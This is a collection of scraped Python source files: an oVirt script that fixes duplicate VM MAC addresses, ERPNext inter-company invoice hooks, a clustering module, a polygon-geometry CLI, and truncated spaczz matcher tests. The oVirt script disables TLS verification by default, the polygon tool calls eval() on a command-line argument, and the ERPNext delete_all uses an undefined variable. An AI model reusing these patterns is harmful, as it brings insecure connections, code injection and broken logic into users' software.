+{"seq_id":"17728416773","text":"import argparse\nimport contextlib\nimport getpass\nimport logging\nimport sys\n\nfrom collections import defaultdict\n\nimport ovirtsdk4 as sdk\nimport ovirtsdk4.types as types\n\n\nclass VmEntry(object):\n def __init__(self, vm, nic):\n self.vm_id = vm.id\n self.vm_name = vm.name\n self.vm_status = vm.status\n self.vm_cluster = vm.cluster.id\n self.nic_id = nic.id\n self.nic_name = nic.name\n self.nic_plugged = nic.plugged\n\n\ndef main():\n args = _parse_args()\n _setup_logging()\n log = logging.getLogger()\n connection = sdk.Connection(\n url=args.url,\n username=args.user,\n password=getpass.getpass('Please enter user password: '),\n ca_file=args.ca if args.ca else None,\n insecure=False if args.ca else True,\n debug=args.debug,\n log=log\n )\n vms_service = connection.system_service().vms_service()\n allowed_clusters = _get_allowed_clusters(connection, args.data_center)\n if not allowed_clusters:\n log.error(\"No clusters found, check data-center argument.\")\n\n with contextlib.closing(connection):\n for loop in range(0, args.loop):\n log.info(\"Starting iteration %d\", loop)\n mac_vms = _find_show_duplicates(vms_service, allowed_clusters)\n if mac_vms and not args.dryrun:\n _fix_duplicates(vms_service, allowed_clusters, mac_vms)\n\n\ndef _setup_logging():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='macs.log',\n filemode='w')\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(levelname)-8s : %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n\n\ndef _build_mac_vms(vms_service, allowed_clusters):\n mac_vms = defaultdict(set)\n for vm in vms_service.list():\n if vm.cluster.id not in allowed_clusters:\n continue\n for nic in vms_service.vm_service(vm.id).nics_service().list():\n entry = VmEntry(vm, nic)\n mac_vms[nic.mac.address].add(entry)\n return {mac: vm for mac, vm in mac_vms.iteritems() if len(vm) > 1}\n\n\ndef _can_fix_duplicate(mac, vms, allowed_clusters):\n log = logging.getLogger()\n _CANTFIX_MSG = 'Cannot fix MAC %s automatically,'\n _REASON_PLUG = 'more than 1 VM with NIC plugged is not DOWN'\n CANTFIX_PLUG = '{} {}'.format(_CANTFIX_MSG, _REASON_PLUG)\n if sum(not _down_or_unplugged(vm) for vm in vms) > 1:\n log.warning(CANTFIX_PLUG, mac)\n return False\n return True\n\n\ndef _down_or_unplugged(vm):\n return (vm.vm_status == types.VmStatus.DOWN or not vm.nic_plugged)\n\n\ndef _find_show_duplicates(vms_service, allowed_clusters):\n log = logging.getLogger()\n mac_vms = _build_mac_vms(vms_service, allowed_clusters)\n if not mac_vms:\n log.info(\"No duplicate MACs found\")\n else:\n log.info(\"Duplicate MACs found:\")\n _show_duplicate(mac_vms)\n return mac_vms\n\n\ndef _fix_duplicates(vms_service, allowed_clusters, mac_vms):\n log = logging.getLogger()\n for mac in mac_vms:\n if not _can_fix_duplicate(mac, mac_vms[mac], allowed_clusters):\n continue\n log.info(\"Fixing duplicate MAC %s automatically:\", mac)\n for vm in mac_vms[mac]:\n if _down_or_unplugged(vm):\n log.info(\" Refreshing %s %s\", vm.vm_name, vm.nic_name)\n _refresh_nic(vms_service, vm)\n\n\ndef _get_allowed_clusters(connection, data_centers):\n dcs_service = connection.system_service().data_centers_service()\n clusters_service = connection.system_service().clusters_service()\n return {c.id for c in clusters_service.list()\n if dcs_service.data_center_service(c.data_center.id).get().name\n in data_centers}\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(description='Fix duplicate MACs')\n parser.add_argument('--url', type=str, required=True,\n help='API URL (https://example/ovirt-engine/api)')\n parser.add_argument('--dry-run', dest='dryrun', action='store_true',\n help='Do not attempt to fix, just test')\n parser.add_argument('--debug', dest='debug', action='store_true',\n help='Log all API interaction')\n parser.add_argument('--loop', type=int, default=1,\n help='LOOP find and fix iterations')\n parser.add_argument('--data-center', type=str, default=\"Default\",\n help='DATA-CENTER(s) to run (Default)', nargs='+')\n parser.add_argument('--user', type=str, default=\"admin@internal\",\n help='USER to login to RHV-M, (admin@internal)')\n parser.add_argument('--ca', type=str, default=\"\",\n help='PATH to the RHV HTTP CA Certificate (insecure)')\n return parser.parse_args()\n\n\ndef _refresh_nic(vms_service, vm):\n nics_service = vms_service.vm_service(vm.vm_id).nics_service()\n nic = nics_service.nic_service(vm.nic_id).get()\n nics_service.nic_service(nic.id).remove()\n nics_service.add(\n types.Nic(\n name=nic.name,\n description=nic.description,\n vnic_profile=nic.vnic_profile\n ),\n )\n\n\ndef _show_duplicate(mac_vms):\n log = logging.getLogger()\n for mac in mac_vms:\n log.info(\"MAC %s is in use by following VMs\", mac)\n for vm in mac_vms[mac]:\n log.info(\" VM %s is %s, nic %s is %s\", vm.vm_name, vm.vm_status,\n vm.nic_name, \"plugged\" if vm.nic_plugged else \"unplugged\")\n\n\nif __name__ == '__main__':\n sys.exit(main() or 0)\n","repo_name":"oVirt/python-ovirt-engine-sdk4","sub_path":"examples/fix_dup_nic_macs.py","file_name":"fix_dup_nic_macs.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"14488758442","text":"\nfrom __future__ import unicode_literals\n\nimport frappe\nfrom frappe import _\n\nfrom frappe.model.mapper import get_mapped_doc\nfrom erpnext.accounts.utils import get_fiscal_year\nfrom erpnext.accounts.doctype.sales_invoice.sales_invoice import SalesInvoice\nfrom chem_intercompany.api import check_counter_series, validate_inter_company_transaction, get_inter_company_details\n\ndef on_submit(self, method):\n\tcreate_purchase_invoice(self)\n\ndef on_trash(self, method):\n\tdelete_all(self)\n\ndef on_cancel(self, method):\n\tcancel_all(self)\n\ndef cancel_all(self):\n\tif self.get('pi_ref'):\n\t\tdoc = frappe.get_doc(\"Purchase Invoice\", self.pi_ref)\n\n\t\tif doc.docstatus == 1:\n\t\t\tdoc.cancel()\n\ndef delete_all(self):\n\tif self.get('pr_ref'):\n\t\tpr_ref = self.pr_ref\n\t\tfrappe.db.set_value(\"Purchase Invoice\", self.pr_ref, 'inter_company_invoice_reference', None)\n\t\tfrappe.db.set_value(\"Purchase Invoice\", self.pr_ref, 'si_ref', None)\n\n\t\tself.db_set(\"pi_ref\", None)\n\t\tself.db_set(\"inter_company_invoice_reference\", None)\n\n\t\tdoc = frappe.get_doc(\"Purchase Invoice\", pi_ref)\n\t\tdoc.delete()\n\ndef create_purchase_invoice(self):\n\tcheck_inter_company_transaction = None\n\n\tif frappe.db.exists(\"Company\",self.customer):\n\t\tcheck_inter_company_transaction = frappe.get_value(\n\t\t\t\"Company\", self.customer, \"allow_inter_company_transaction\"\n\t\t)\n\t\n\tif check_inter_company_transaction:\n\t\t\n\t\tcompany = frappe.get_doc(\"Company\", self.customer)\n\t\tinter_company_list = [item.company for item in company.allowed_to_transact_with]\n\t\n\t\tif self.company in inter_company_list:\n\t\t\tpi = make_inter_company_transaction(self)\n\n\t\t\tfor index, item in enumerate(self.items):\n\t\t\t\tif item.delivery_note:\n\t\t\t\t\tpi.items[index].purchase_receipt = frappe.db.get_value(\n\t\t\t\t\t\t\"Delivery Note\",\n\t\t\t\t\t\titem.delivery_note,\n\t\t\t\t\t\t'inter_company_receipt_reference'\n\t\t\t\t\t)\n\n\t\t\t\tif item.sales_order:\n\t\t\t\t\tpi.items[index].purchase_order = frappe.db.get_value(\n\t\t\t\t\t\t\"Sales Order\",\n\t\t\t\t\t\titem.sales_order,\n\t\t\t\t\t\t'inter_company_order_reference'\n\t\t\t\t\t)\n\t\t\n\t\t\t# authority = frappe.db.get_value(\"Company\", pi.company, 'authority')\n\t\t\t\t\n\t\t\t# if authority == \"Unauthorized\" and (not pi.amended_from) and self.si_ref:\n\t\t\t\t\n\t\t\t# \talternate_company = self.alternate_company\n\t\t\t# \tcompany_series = frappe.db.get_value(\"Company\", alternate_company, 'company_series')\n\n\t\t\t# \tpi.company_series = frappe.db.get_value(\"Company\", pi.name, \"company_series\")\n\t\t\t# \tpi.series_value = check_counter_series(pi.naming_series, company_series) - 1\n\t\t\t# \tpi.naming_series = 'A' + pi.naming_series\n\t\t\t\n\t\t\tpi.si_ref = self.name\n\n\t\t\tpi.save()\n\t\t\tif self.update_stock:\n\t\t\t\tpi.db_set('update_stock', 1)\n\t\t\t\n\t\t\tpi.submit()\n\t\t\t\n\t\t\tif self.si_ref:\n\t\t\t\tsi_ref = frappe.db.get_value(\"Sales Invoice\", self.name, 'si_ref')\n\t\t\t\tpi_ref = frappe.db.get_value(\"Sales Invoice\", self.name, 'pi_ref')\n\t\t\t\t\n\t\t\t\tfrappe.db.set_value(\"Purchase Invoice\", pi.name, 'si_ref', self.name)\n\t\t\t\tfrappe.db.set_value(\"Purchase Invoice\", pi_ref, 'si_ref', si_ref)\n\n\t\t\tself.db_set('pi_ref', pi.name)\n\ndef make_inter_company_transaction(self, target_doc=None):\n\tsource_doc = frappe.get_doc(\"Sales Invoice\", self.name)\n\n\tvalidate_inter_company_transaction(source_doc, \"Sales Invoice\")\n\tdetails = get_inter_company_details(source_doc, \"Sales Invoice\")\n\n\tdef set_missing_values(source, target):\n\t\tif self.amended_from:\n\t\t\tname = frappe.db.get_value(\"Purchase Invoice\", {'si_ref': self.amended_from}, \"name\")\n\t\t\ttarget.amended_from = name\n\t\t\n\t\ttarget.company = source.customer\n\t\ttarget.supplier = source.company\n\t\ttarget.buying_price_list = source.selling_price_list\n\n\t\tabbr = frappe.db.get_value(\"Company\", target.company, 'abbr')\n\n\t\ttarget.set_warehouse = \"Stores - {}\".format(abbr)\n\t\ttarget.rejected_warehouse = \"Stores - {}\".format(abbr)\n\n\t\tif source.taxes_and_charges:\n\t\t\ttarget_company_abbr = frappe.db.get_value(\"Company\", target.company, \"abbr\")\n\t\t\tsource_company_abbr = frappe.db.get_value(\"Company\", source.company, \"abbr\")\n\t\t\t\n\t\t\ttaxes_and_charges = source.taxes_and_charges.replace(\n\t\t\t\tsource_company_abbr, target_company_abbr\n\t\t\t)\n\n\t\t\tif frappe.db.exists(\"Purchase Taxes and Charges Template\", taxes_and_charges):\n\t\t\t\ttarget.taxes_and_charges = taxes_and_charges\n\n\t\t\ttarget.taxes = source.taxes\n\t\t\t\n\t\t\tfor index, item in enumerate(source.taxes):\n\t\t\t\ttarget.taxes[index].account_head = item.account_head.replace(\n\t\t\t\t\tsource_company_abbr, target_company_abbr\n\t\t\t\t)\n\t\t\t\n\t\ttarget.run_method(\"set_missing_values\")\n\t\n\tdef update_accounts(source_doc, target_doc, source_parent):\n\t\ttarget_company = source_parent.customer\n\t\tdoc = frappe.get_doc(\"Company\", target_company)\n\n\t\tif source_doc.pr_detail:\n\t\t\ttarget_doc.purchase_receipt = frappe.db.get_value(\"Purchase Receipt Item\", source_doc.pr_detail, 'parent')\n\t\tif source_doc.purchase_order_item:\n\t\t\ttarget_doc.purchase_order = frappe.db.get_value(\"Purchase Order Item\", source_doc.purchase_order_item, 'parent')\n\n\t\ttarget_doc.income_account = doc.default_income_account\n\t\ttarget_doc.expense_account = doc.default_expense_account\n\t\ttarget_doc.cost_center = doc.cost_center\n\t\n\tdoclist = get_mapped_doc(\"Sales Invoice\", self.name,\t{\n\t\t\"Sales Invoice\": {\n\t\t\t\"doctype\": \"Purchase Invoice\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"name\": \"bill_no\",\n\t\t\t\t\"posting_date\": \"bill_date\",\n\t\t\t},\n\t\t\t\"field_no_map\": [\n\t\t\t\t\"taxes_and_charges\",\n\t\t\t\t\"series_value\",\n\t\t\t\t\"update_stock\",\n\t\t\t\t\"real_difference_amount\"\n\t\t\t],\n\t\t},\n\t\t\"Sales Invoice Item\": {\n\t\t\t\"doctype\": \"Purchase Invoice Item\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"pr_detail\": \"pr_detail\",\n\t\t\t\t\"purchase_order_item\": \"po_detail\",\n\t\t\t},\n\t\t\t\"field_no_map\": [\n\t\t\t\t\"income_account\",\n\t\t\t\t\"expense_account\",\n\t\t\t\t\"cost_center\",\n\t\t\t\t\"warehouse\",\n\t\t\t], \"postprocess\": update_accounts,\n\t\t}\n\t}, target_doc, set_missing_values)\n\n\treturn doclist\n","repo_name":"questerp/chem_intercompany","sub_path":"chem_intercompany/chem_intercompany/doc_events/sales_invoice.py","file_name":"sales_invoice.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72633417459","text":"import numpy as np\n\nfrom typing import Dict, Tuple\nfrom collections import Counter\n\nfrom sklearn.cluster import AgglomerativeClustering\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport config\nfrom config import *\n\n\nmatplotlib.use('TkAgg')\n\ndef generate_clusters(dist_matrix: np.ndarray, \n linkage:str, \n distance_threshold: float,\n min_cluster_size: int) -> AgglomerativeClustering:\n \"\"\"\n Generate clusters using agglomerative (hierarchical) clustering.\n\n Parameters\n ----------\n dist_matrix : np.ndarray\n distance matrix used for clustering.\n linkage: str\n linkage method (see sklear documentation).\n distance_threshold: float\n distance above which clusters will not be merged (see sklearn docs).\n\n Returns\n -------\n AgglomerativeClustering\n clustering of spectra.\n \"\"\"\n print(f\"{linkage}-linkage hierarchical clustering...\")\n clustering = AgglomerativeClustering(\n n_clusters=None,\n metric=\"precomputed\", \n linkage=linkage,\n distance_threshold=distance_threshold,\n compute_distances=True).fit(dist_matrix)\n \n new_labels = _post_process_clusters(clustering.labels_, min_cluster_size)\n clustering.labels_ = new_labels\n clustering.n_clusters_ = _count_clusters(new_labels)\n\n if config.plot_dendrogram:\n plot_dendrogram(clustering=clustering, labels=clustering.labels_)\n\n return clustering\n\n\ndef _post_process_clusters(labels: np.ndarray, min_cluster_size: int) -> np.ndarray:\n \"\"\"\n Label clusters of size 1 as noise (-1).\n\n Parameters\n ----------\n labels : np.ndarray\n array of predicted labels.\n\n Returns\n -------\n np.ndarray\n new labels where samples in singleton clusters are replaced by -1 (noise).\n \"\"\"\n # count occurences of labels\n c = Counter(labels)\n singleton_labels = [k for k, v in c.items() if v < min_cluster_size]\n # if label appears once, replace with -1 (noise sample)\n new_labels = [l if l not in singleton_labels else -1 for l in labels]\n return np.array(new_labels)\n\ndef _count_clusters(labels: np.ndarray) -> np.ndarray:\n return len(np.delete(np.unique(labels), -1))\n\n\n# code from: \n# https://scikit-learn.org/stable/auto_examples/cluster/plot_agglomerative_dendrogram.html\ndef plot_dendrogram(clustering, **kwargs):\n \"\"\"\n Plot a dendrogram of the clustering result.\n\n Parameters\n ----------\n clustering : AgglomerativeClustering\n clustering result.\n \"\"\"\n # Create linkage matrix and then plot the dendrogram\n\n # create the counts of samples under each node\n counts = np.zeros(clustering.children_.shape[0])\n n_samples = len(clustering.labels_)\n for i, merge in enumerate(clustering.children_):\n current_count = 0\n for child_idx in merge:\n if child_idx < n_samples:\n current_count += 1 # leaf node\n else:\n current_count += counts[child_idx - n_samples]\n counts[i] = current_count\n\n linkage_matrix = np.column_stack(\n [clustering.children_, clustering.distances_, counts]\n ).astype(float)\n\n # plot the corresponding dendrogram\n fig = plt.figure(\"Clustering dendrogram\")\n dendrogram(linkage_matrix, **kwargs)\n fig.show()","repo_name":"Janne98/falcon-ext","sub_path":"falcon_ext/cluster/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28285445509","text":"if 1: # Header\n # Copyright, license\n # These \"trigger strings\" can be managed with trigger.py\n #∞copyright∞# Copyright (C) 2014 Don Peterson #∞copyright∞#\n #∞contact∞# gmail.com@someonesdad1 #∞contact∞#\n #∞license∞#\n # Licensed under the Open Software License version 3.0.\n # See http://opensource.org/licenses/OSL-3.0.\n #∞license∞#\n #∞what∞#\n # Calculate parameters of a regular polygon given the inscribed or\n # circumscribed circle diameter.\n #∞what∞#\n #∞test∞# #∞test∞#\n # Standard imports\n from fractions import Fraction\n import sys\n import os\n import getopt\n from pdb import set_trace as xx\n # Custom imports\n from wrap import dedent\n from color import TRM as t\n from f import flt, pi, sqrt, sin, cos, tan\n # Global variables\n class g:\n pass\n g.width = int(os.environ.get(\"COLUMNS\", 80)) - 1\n ii = isinstance\n isatty = sys.stdout.isatty()\n t.ti = t(\"ornl\") if isatty else \"\"\n t.hi = t(\"yell\") if isatty else \"\"\n t.insc = t(\"purl\") if isatty else \"\"\n t.circ = t(\"trq\") if isatty else \"\"\n t.nn = t.n if isatty else \"\"\nif 1: # Utility\n def Error(*msg, status=1):\n print(*msg, file=sys.stderr)\n exit(status)\n def Usage(d, status=1):\n print(dedent(f'''\n Usage: {sys.argv[0]} [options] dia1 [dia2...]\n Print dimensions of regular polygons for given diameter(s) as either\n the inscribed or circumscribed circle diameter. The diameters can\n be strings like '47', '4.7', '7/16', or '1-7/16'.\n Options:\n -a Abbreviate numbers [{d['-a']}]\n -c l Color highlight the sides in the list l [{d[\"-c\"]}]\n -d n Number of significant digits to print [{d[\"-d\"]}]\n -n l Which sides to print; must be a comma-separated list of\n integers or a range() call. [{d[\"-n\"]}]\n -t Produce a table of useful factors allowing you to calculate\n various parameters of polygons given certain dimensions.\n '''))\n exit(status)\n def ParseCommandLine(d):\n d[\"-a\"] = True # Abbreviate numbers\n d[\"-c\"] = \"\" # Which lines to highlight\n d[\"-d\"] = 4 # Number of significant digits\n d[\"-n\"] = \"3,4,5,6,7,8\"\n d[\"-t\"] = False # Print the table\n try:\n opts, diameters = getopt.getopt(sys.argv[1:], \"ac:d:n:t\")\n except getopt.GetoptError as e:\n print(str(e))\n exit(1)\n for o, arg in opts:\n if o[1] in \"at\":\n d[o] = not d[o]\n elif o in (\"-c\",):\n d[\"-c\"] = arg\n elif o in (\"-d\",):\n try:\n d[\"-d\"] = int(arg)\n if not (1 <= d[\"-d\"] <= 15):\n raise ValueError()\n except ValueError:\n msg = (\"-d option's argument must be an integer between \"\n \"1 and 15\")\n Error(msg)\n elif o in (\"-n\",):\n if \"range\" in arg:\n d[\"-n\"] = ','.join(str(i) for i in list(eval(arg)) if i > 2)\n else:\n d[\"-n\"] = arg\n x = flt(0)\n x.n = d[\"-d\"]\n if d[\"-a\"]:\n x.rtz = x.rtdp = True\n x.low = 1e-4\n x.high = 1e6\n if not d[\"-t\"] and not diameters:\n Usage(d)\n # Convert d[\"-c\"] to a set of integers\n s = d[\"-c\"].split(\",\")\n d[\"-c\"] = set([int(i) for i in s]) if s != [\"\"] else set([])\n return diameters\nif 1: # Core functionality\n def Convert(size):\n '''Convert the string size to a flt. Can be an integer, flt,\n or fraction of e.g. the forms 7/8 or 1-7/8.\n '''\n if \"/\" in size:\n ip = 0\n num, denom = size.split(\"/\")\n if \"-\" in num:\n ip, num = num.split(\"-\")\n num, denom, ip = [int(i) for i in (num, denom, ip)]\n return flt(Fraction(num + ip*denom, denom))\n else:\n return flt(size)\n def PrintFormulaTable():\n '''Print a table similar to the table on page 1-39 of Mark's\n \"Standard Handbook for Mechanical Engineers\", 7th ed., 1967.\n '''\n def F(x, w=None):\n '''str of flt x with leading 0 removed. If w is not None, it's a\n width to center the string of x in.\n '''\n s = str(x)\n if s[0] == \"0\" and s[1] == \".\":\n s = s[1:]\n if w is None:\n return s\n return f\"{s:^{w}s}\"\n # Check of formulas: I drew a 6\" diameter circle and used a\n # 30-60-90 triangle to draw a hexagon around it. The measurements\n # agreed with the values calculated with the table to better than\n # 0.1%.\n print(dedent('''\n Regular polygons\n d = inscribed circle diameter, D = circumscribed circle diameter, A = area,\n s = perimeter, a = length of one side, T = angle subtended by side\n '''))\n # Width of printout: the column for n is 2 wide and the remaining 9\n # columns are the width of a flt at current significance. The smallest\n # number (and thus the longest) will be a/D for n=64. This thus\n # defines the width w for each column.\n s = F(sin(pi/64))\n w = len(s)\n # Use new printing methods with flt and Unicode. There are 9\n # columns for flt and we want to fit into g.width if possible.\n def f(x):\n return 4 + 9*x + 3\n while True:\n if f(w + 1) < g.width:\n w += 1\n else:\n break\n print(f\"{'n':^2s}\", end=\" \")\n for s in \"T(deg) A/d² A/D² A/a² d/a D/a a/d a/D D/d\".split():\n print(f\"{s:^{w}s}\", end=\" \")\n print()\n sizes = list(range(3, 11)) + [12, 15, 16, 20, 24, 32, 48, 60, 64]\n for n in sizes:\n colorize = n in opts[\"-c\"]\n res = []\n K = pi/n\n res.append(\"{0:^2d}\".format(n))\n res.append(F(2*K*180/pi, w)) # T\n res.append(F(n*tan(K)/4, w)) # A/d^2\n res.append(F(n*sin(2*K)/8, w)) # A/D^2\n res.append(F(n/(tan(K)*4), w)) # A/a^2\n doa, Doa = 1/tan(K), 1/sin(K)\n res.append(F(doa, w)) # d/a\n res.append(F(Doa, w)) # D/a\n res.append(F(1/doa, w)) # a/d\n res.append(F(1/Doa, w)) # a/D\n res.append(F(Doa/doa, w)) # D/d\n if colorize:\n print(f\"{t.hi}\", end=\"\")\n print(' '.join(res))\n if colorize:\n print(f\"{t.nn}\", end=\"\")\n if 1: # Print formulas\n print()\n print(dedent('''\n Formulas:\n k = π/n T = 360*k/π\n a/d = tan(k) A/d² = n*tan(k)/4\n a/D = sin(k) A/D² = n*sin(2*k)/8\n D/d = 1/cos(k) A/a² = 4*n/tan(k)\n \n a = d*tan(k) = D*sin(k)\n r = d/2 = sqrt(R² - a²/4) = a/(tan(k)*2) = R*cos(k)\n R = D/2 = sqrt(r² + a²/4) = a/(sin(k)*2) = r/cos(k)\n A = n*a*r/2 = n*a/2*sqrt((D² - a²)/4)\n = n*a²*cot(k)/4 = n*r²*tan(k) = n*R²*sin(2*k)/2\n s = 2*sqrt(R^2 - r^2) = 2*r*tan(k)\n ''', n=4))\n print('\\nRef: Marks, \"Std Hdbk for Mech Engrs\", pg 1-39, 7th ed., 1967')\n exit(0)\n def Title():\n print(dedent(f'''\n {t.ti}Properties of regular polygons{t.nn}\n d = inscribed diameter\n D = circumscribed diameter\n a = length of side\n '''))\n def Poly(s, n, circumscribed=False, leave_out=\"\"):\n '''Given the diameter in the string s, number of sides n, and\n options dictionary opts, calculate the parameters and print the\n table. Leave out the indicated column (only will be d or D).\n -----------------\n Definitions are:\n d = inscribed circle diameter\n D = circumscribed circle diameter\n s = perimeter\n A = area or surface area\n a = length of side\n r = radius of inscribed circle = d/2\n R = radius of circumscribed circle = D/2\n n = number of sides\n Equations are:\n theta = 2*pi/n = central angle subtended by side\n K = theta/2\n a = length of side = d*tan(K) = D*sin(K)\n r = sqrt(R^2 - a^2/4) = a*cot(K)/2 = R*cos(K)\n R = sqrt(r^2 + a^2/4) = a*csc(K)/2 = r*sec(K) = r/cos(K)\n A = n*a*r/2 = n*a/2*sqrt((D^2 - a^2)/4)\n = n*a^2*cot(K)/4 = n*r^2*tan(K) = n*R^2*sin(2*K)/2\n s = 2*sqrt(R^2 - r^2) = 2*r*tan(K)\n '''\n try:\n d = Convert(s)\n except Exception:\n Error(f\"'{s}' is not a valid number\")\n assert ii(d, (flt, int, Fraction))\n assert ii(n, int)\n assert n > 0\n K = pi/n\n D = d/cos(K)\n if circumscribed:\n D = d\n d = D*cos(K)\n a = d*tan(K)\n A = n*a*d/4\n s = n*a\n colorize = n in opts[\"-c\"]\n if colorize:\n print(f\"{t.hi}\", end=\"\")\n if leave_out == \"d\":\n L = (n, D, a, A, s)\n elif leave_out == \"D\":\n L = (n, d, a, A, s)\n else:\n Error(f\"Program bug: leave_out = {leave_out!r}\")\n for x in L:\n w = opts[\"-d\"] + 3\n print(f\"{x!s:^{w}s}\", end=\" \")\n if colorize:\n print(f\"{t.nn}\", end=\"\")\n print()\n def Report(d):\n '''Print the calculated values assuming the diameter string in d\n is first an inscribed diameter, then the circumscribed diameter.\n '''\n def Print(circumscribed=False, leave_out=\"\"):\n fmt = \"{{0:^{0}}}\".format(3 + opts[\"-d\"])\n w = 3 + opts[\"-d\"]\n for s in \"Sides d D a Area Perim\".split():\n if s == leave_out:\n continue\n print(f\"{s:^{w}s}\", end=\" \")\n print()\n for n in number_of_sides:\n Poly(d, n, circumscribed, leave_out=leave_out)\n try:\n number_of_sides = [int(i) for i in opts[\"-n\"].split(\",\")]\n except Exception:\n Error(\"'{0}' is bad -n option\".format(opts[\"-n\"]))\n print(f\"\\n{t.insc}d =\", d, f\"= inscribed diameter{t.nn}\")\n Print(circumscribed=False, leave_out=\"d\")\n print(f\"\\n{t.circ}D =\", d, f\"= circumscribed diameter (distance across points){t.nn}\")\n Print(circumscribed=True, leave_out=\"D\")\nif __name__ == \"__main__\":\n opts = {}\n diameters = ParseCommandLine(opts)\n if opts[\"-t\"]:\n PrintFormulaTable()\n Title()\n for d in diameters:\n Report(d)\n if len(diameters) > 1:\n print()\n","repo_name":"someonesdad1/plib","sub_path":"pgm/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":11197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29515752045","text":"\"\"\"Tests for tokenmatcher module.\"\"\"\nimport pickle\nimport typing as ty\n\nimport pytest\nfrom spacy.language import Language\nfrom spacy.tokens import Doc\nfrom spacy.tokens import Span\nimport srsly\n\nfrom spaczz.matcher import TokenMatcher\n\nDATA_PATTERN_1: ty.List[ty.Dict[str, ty.Any]] = [\n {\"TEXT\": \"SQL\"},\n {\"LOWER\": {\"FREGEX\": \"(database){s<=1}\"}},\n {\"LOWER\": {\"FUZZY\": \"access\"}},\n]\n\nDATA_PATTERN_2: ty.List[ty.Dict[str, ty.Any]] = [\n {\"TEXT\": {\"FUZZY\": \"Sequel\"}},\n {\"LOWER\": \"db\"},\n]\nNAME_PATTERN: ty.List[ty.Dict[str, ty.Any]] = [{\"TEXT\": {\"FUZZY\": \"Garfield\"}}]\n\n\ndef add_name_ent(\n matcher: TokenMatcher,\n doc: Doc,\n i: int,\n matches: ty.List[ty.Tuple[str, int, int, int, str]],\n) -> None:\n \"\"\"Callback on match function. Adds \"NAME\" entities to doc.\"\"\"\n _match_id, start, end, _ratio, _pattern = matches[i]\n entity = Span(doc, start, end, label=\"NAME\")\n doc.ents += (entity,) # type: ignore\n\n\n@pytest.fixture\ndef matcher(nlp: Language) -> TokenMatcher:\n \"\"\"It returns a token matcher.\"\"\"\n matcher = TokenMatcher(vocab=nlp.vocab)\n matcher.add(\"DATA\", [DATA_PATTERN_1, DATA_PATTERN_2])\n matcher.add(\"NAME\", [NAME_PATTERN], on_match=add_name_ent)\n return matcher\n\n\n@pytest.fixture\ndef doc(nlp: Language) -> Doc:\n \"\"\"Example doc for search.\"\"\"\n return nlp(\n \"\"\"The manager gave me SQL databesE acess so now I can acces the Sequal DB.\n My manager's name is Grfield.\n \"\"\"\n )\n\n\ndef test_adding_patterns(matcher: TokenMatcher) -> None:\n \"\"\"It adds the \"TEST\" label and some patterns to the matcher.\"\"\"\n assert matcher.patterns == [\n {\n \"label\": \"DATA\",\n \"pattern\": [\n {\"TEXT\": \"SQL\"},\n {\"LOWER\": {\"FREGEX\": \"(database){s<=1}\"}},\n {\"LOWER\": {\"FUZZY\": \"access\"}},\n ],\n \"type\": \"token\",\n },\n {\n \"label\": \"DATA\",\n \"pattern\": [{\"TEXT\": {\"FUZZY\": \"Sequel\"}}, {\"LOWER\": \"db\"}],\n \"type\": \"token\",\n },\n {\n \"label\": \"NAME\",\n \"pattern\": [{\"TEXT\": {\"FUZZY\": \"Garfield\"}}],\n \"type\": \"token\",\n },\n ]\n\n\ndef test_add_without_list_of_patterns_raises_error(matcher: TokenMatcher) -> None:\n \"\"\"Trying to add non-lists of patterns raises a TypeError.\"\"\"\n with pytest.raises(TypeError):\n matcher.add(\"TEST\", [{\"TEXT\": \"error\"}]) # type: ignore\n\n\ndef test_add_with_zero_len_pattern(matcher: TokenMatcher) -> None:\n \"\"\"Trying to add zero-length patterns raises a ValueError.\"\"\"\n with pytest.raises(ValueError):\n matcher.add(\"TEST\", [[]])\n\n\ndef test_len_returns_count_of_labels_in_matcher(matcher: TokenMatcher) -> None:\n \"\"\"It returns the sum of unique labels in the matcher.\"\"\"\n assert len(matcher) == 2\n\n\ndef test_in_returns_bool_of_label_in_matcher(matcher: TokenMatcher) -> None:\n \"\"\"It returns whether a label is in the matcher.\"\"\"\n assert \"DATA\" in matcher\n\n\ndef test_labels_returns_label_names(matcher: TokenMatcher) -> None:\n \"\"\"It returns a tuple of all unique label names.\"\"\"\n assert all(label in matcher.labels for label in (\"DATA\", \"NAME\"))\n\n\ndef test_vocab_prop_returns_vocab(matcher: TokenMatcher, nlp: Language) -> None:\n \"\"\"It returns the vocab it was initialized with.\"\"\"\n assert matcher.vocab == nlp.vocab\n\n\ndef test_remove_label(matcher: TokenMatcher) -> None:\n \"\"\"It removes a label from the matcher.\"\"\"\n matcher.add(\"TEST\", [[{\"TEXT\": \"test\"}]])\n assert \"TEST\" in matcher\n matcher.remove(\"TEST\")\n assert \"TEST\" not in matcher\n\n\ndef test_remove_label_raises_error_if_label_not_in_matcher(\n matcher: TokenMatcher,\n) -> None:\n \"\"\"It raises a ValueError if trying to remove a label not present.\"\"\"\n with pytest.raises(ValueError):\n matcher.remove(\"TEST\")\n\n\ndef test_matcher_returns_matches(matcher: TokenMatcher, doc: Doc) -> None:\n \"\"\"Calling the matcher on a `Doc` object returns matches.\"\"\"\n assert matcher(doc) == [\n (\"DATA\", 4, 7, 91, srsly.json_dumps(DATA_PATTERN_1)),\n (\"DATA\", 13, 15, 87, srsly.json_dumps(DATA_PATTERN_2)),\n (\"NAME\", 22, 23, 93, srsly.json_dumps(NAME_PATTERN)),\n ]\n\n\ndef test_matcher_returns_matches_in_expected_order(nlp: Language) -> 